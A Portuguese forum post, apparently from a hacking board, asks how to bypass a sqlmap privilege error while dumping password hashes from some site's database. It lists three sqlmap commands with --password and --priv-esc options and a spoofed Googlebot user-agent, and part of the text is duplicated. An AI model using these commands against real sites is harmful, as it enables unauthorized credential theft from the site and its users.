Estou tentando encontrar os passwords hashes de um banco de dados. Consegui os usuários facilmente, mas na hora de conseguir os passwords, usando o sqlmap, recebo o seguinte aviso:
[CRITICAL] unable to retrieve the password hashes for the database users (most probably because the session user has no read privileges over the relevant system database table).
Queria saber se tem algum jeito de burlar isso...
Já utilizei várias sintaxes de comando:
./sqlmap.py -u SITE -U USUARIO --password --priv-esc -o --threads 10 --hex --level=5 --user-agent="Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
./sqlmap.py -u SITE -U USUARIO --password --level=5 --user-agent="Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
./sqlmap.py -u SITE -U USUARIO --password -v 5 --user-agent="Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
O último código me dá algumas informações, mas não sei interpretá-las muito bem... Quem souber, está aqui:
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
[CRITICAL] unable to retrieve the password hashes for the database users (most probably because the session user has no read privileges over the relevant system database table).
Queria saber se tem algum jeito de burlar isso...
Já utilizei várias sintaxes de comando:
./sqlmap.py -u SITE -U USUARIO --password --priv-esc -o --threads 10 --hex --level=5 --user-agent="Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
./sqlmap.py -u SITE -U USUARIO --password --level=5 --user-agent="Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
./sqlmap.py -u SITE -U USUARIO --password -v 5 --user-agent="Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
O último código me dá algumas informações, mas não sei interpretá-las muito bem... Quem souber, está aqui:
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
Comment